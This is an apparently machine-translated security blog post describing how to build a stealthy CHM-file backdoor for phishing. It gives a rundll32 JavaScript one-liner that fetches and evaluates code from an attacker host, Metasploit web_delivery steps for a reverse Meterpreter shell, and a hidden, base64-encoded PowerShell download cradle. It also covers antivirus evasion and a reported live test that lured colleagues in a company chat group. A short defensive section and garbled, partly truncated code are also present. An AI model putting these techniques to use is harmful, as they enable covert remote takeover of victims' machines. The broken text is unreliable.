About 0x00
Previously wrote a article about client fishing: "Effective fishing using PowerShell client", in the process of testing with each client, the individual found the CHM file is the best use, but its disadvantage is that the black box, so that the attacker will be aware of. So how do you let him not play the black box? That's what this article is about.
About 0x01 CHM
Before you introduce how to use CHM as a backdoor, you first need to know what CMH is.
The CHM (Compiled help Manual) is the compiled helper file. It is Microsoft's new generation of Help file format, using HTML as the source text, the Help content in a similar database compiled storage. CHM supports Javas cript, VBs cript, ActiveX, Java applets, Flash, common graphics files (GIF, JPEG, PNG), Audio video files (MID, WAV, AVI), etc. And can be linked to the Internet via URLs. Because it is easy to use, various forms are also used as e-book formats.
0x02 CHM Production
There are many ways to make CHM. There are a variety of tools to use, here is not to do a detailed introduction. This test uses Easychm to make CHM files, which is very simple to use.
Create the following directory, the file content is arbitrary:
Open Easychm, new and browse. Select the directory. Default file Type:
Click Confirm to see the CHM file in preview:
Select compile to compile into CHM file.
0x03 CHM Execute Command
In 14, @ithurricanept sent a demo on Twitter to run the calculator through the CHM:
Use the following code:
<! DOCTYPE Html>
Write the above code to HTML, place the project directory to compile, generate the CHM file, run the file, and eject the calculator:
0x04 Remove Bullet Frame
Students who have tested Nishang Out-chm will find that when they run a generated CHM file, they will see a clear bullet box. Just like
One night a sudden brain hole, think of a good way to let him do not show the box, that is, using JavaScript backdoor. After testing, the successful implementation of the Meterpreter session without the box, the test uses a modified Python version of JSRAT.PS1, the address is: Myjsrat. Please refer to the Readme for use.
The following is the complete test process:
1, combined with CHM + JsbackdoorJsrat server using interactive mode:
Python myjsrat.py-i 192.168.1.101-p 8080
Access HTTP://192.168.1.101:8080/WTF get the attack code as follows:
rundll32.exe javascript: "\.. \mshtml,runhtmlapplication ";d ocument.write (); H=new%20activexobject (" winhttp.winhttprequest.5.1 "); H.Open (" GET ", "Http://192.168.1.101:8080/connect", false); Try{h.send (); B=h.responsetext;eval (b);} catch (E) {new%20activexobject ("Wscript.Shell"). Run ("cmd/c taskkill/f/im rundll32.exe", 0,true);}
After many tests, the above command was successfully written to the CHM with the following HTML code:
<! DOCTYPE Html>
After compiling, the JS Interactive shell can be obtained successfully:
Direct execution of CMD/C command is a black box, you can use Run to avoid the display of black box. After run, enter WhoAmI > E:\1.txt to get the echo through read.
2. Get Meterpreter SessionThis test gets the Meterpreter session by executing the PowerShell command, which is obtained directly, and automatically executes the PowerShell command after acquiring the client JS Interactive shell to get the Meterpreter session. Here's how:
To open MSF Web_delivery:
~ MSFCONSOLE-LQMSF > Use exploit/multi/script/web_deliverymsf Exploit (web_delivery) > Set Target 2target = 2ms F Exploit (Web_delivery) > Set payload windows/meterpreter/reverse_tcppayload = Windows/meterpreter/reverse_ TCPMSF exploit (web_delivery) > Set lhost 192.168.1.101lhost = 192.168.1.101msf Exploit (web_delivery) > Set Lpor T 6666lport = 6666msf Exploit (web_delivery) > Set srvport 8081SRVPORT = 8081msf Exploit (web_delivery) > set Uripath/uripath =/msf Exploit (web_delivery) > exploit[*] exploit running as background job.msf exploit (web_delive ry) >[*] Started reverse TCP handler on 192.168.1.101:6666[*] Using url:http://0.0.0.0:8081/[*] Local ip:http://192.1 68.1.101:8081/[*] Server started. [*] Run the following command on the target machine:powershell.exe-nop-w hidden-c $n =new-object net.webclient; $n. proxy=[net . Webrequest]::getsystemwebproxy (); $n. Proxy.credentials=[net.credentialcache]::D EFAULTCREDENTIALS;IEX $ N.downloadstring(' http://192.168.1.101:8081/');
A client with PowerShell can obtain a Meterpreter session by executing the following command:
Powershell.exe-nop-w hidden-c $n =new-object net.webclient; $n. Proxy=[net.webrequest]::getsystemwebproxy (); $n. Proxy.credentials=[net.credentialcache]::D efaultcredentials;iex $n. downloadstring (' http://192.168.1.101:8081/') ;
Due to the existence of special characters, we can encode the above code into Base64 format and save the following code to Power.txt
$n =new-object net.webclient; $n. Proxy=[net.webrequest]::getsystemwebproxy (); $n. proxy.credentials=[ Net.credentialcache]::D efaultcredentials;iex $n. downloadstring (' http://192.168.1.101:8081/');
Execute the following command:
Cat Power.txt | Iconv--to-code Utf-16le |base64
The final PowerShell command to be executed is:
Powershell-ep Bypass-enc Iaakag4apqbuaguadwatag8aygbqaguaywb0acaabgblahqalgb3aguaygbjagwaaqblag4adaa7aaoaiaakag4algbwahiabwb4ahkapqbbae4azqb0ac4av Wblagiaugblaheadqblahmadabdadoaogbhaguadabtahkacwb0aguabqbxaguaygbqahiabwb4ahkakaapadsacgagacqabgauafaacgbvahgaeqauaemacg Blagqazqbuahqaaqbhagwacwa9afsatgblahqalgbdahiazqbkaguabgb0agkayqbsaemayqbjaggazqbdadoaogbeaguazgbhahuabab0aemacgblagqazqb Uahqaaqbhagwacwa7aaoaiabjaeuawaagacqabgauagqabwb3ag4ababvageazabzahqacgbpag4azwaoaccaaab0ahqacaa6ac8alwaxadkamgauadeanga4 Ac4amqauadeamaaxadoaoaawadgamqavaccakqa7aa
To get a Meterpreter session directly using the Execute Command mode:
Python myjsrat.py-i 192.168.1.101-p 8080-c "Powershell-ep bypass-enc IAAKAG4APQBUAGUADWATAG8AYGBQAGUAYWB0ACAABGBLAHQ Algb3aguaygbjagwaaqblag4adaa7aaoaiaakag4algbwahiab
During the test, from running the CHM to getting Meterpreter, the client has no obvious exception, the whole black box pops up and gets to Meterpreter session such as:
3. Have you been killed?Probably a lot of people will ask, will not be killed, the following is the result of VirScan:
Http://r.virscan.org/report/6173ee9c62d29806bb84035a8f1738ba
0x05 Utilization ScenariosA picture description (let me guess you will not point):
Note: Casually looking for a few loopholes to use the tool to modify the file name, does not mean that the original author shared the tool has a problem.
0x06 actual test
is to make the CHM file in the way described above, named a more attractive name, for example, in the company's technology group a name for "Make no kill backdoor." File, actual test results such as:
Successful acquisition of multi-person meterpreter sessions.
0X07 Defense
So far I have not found any defensive posture, I know the small partners can share. The best is to improve personal safety awareness, for such documents, pay more attention to, try not to mess up, if not the main point, you can put into the virtual machine inside. Using Procexp.exe, you can see that a CHM file with a backdoor will open a new process:
To encounter this kind of back door, how to trace it, in fact, is very simple, CHM can be anti-compiled into HTML. You can decompile using the hh.exe that comes with Windows. The command is as follows:
C:\users\evi1cg\desktop>hh-decompile Test Poc.chm #test The test folder for the current directory
The results of the implementation are as follows:
0X08 Summary
This test is a combination of some known attack techniques, the result is to make this bundled backdoor more covert, near "perfect", in the ointment is the file when the opening of a short lag. Sometimes small loopholes can be combined to cause great harm, small tricks combined can also become a big kill device. In the spirit of sharing this posture introduced, hope that the small partners can be protected from harm.
0X09 Reference
- https://twitter.com/ithurricanept/status/534993743196090368
- Https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1
- http://drops.wooyun.org/tips/11764
- Https://github.com/samratashok/nishang
This article by EVI1CG original and starts in the dark cloud drops
Advanced combination technology to create a "perfect" bundled backdoor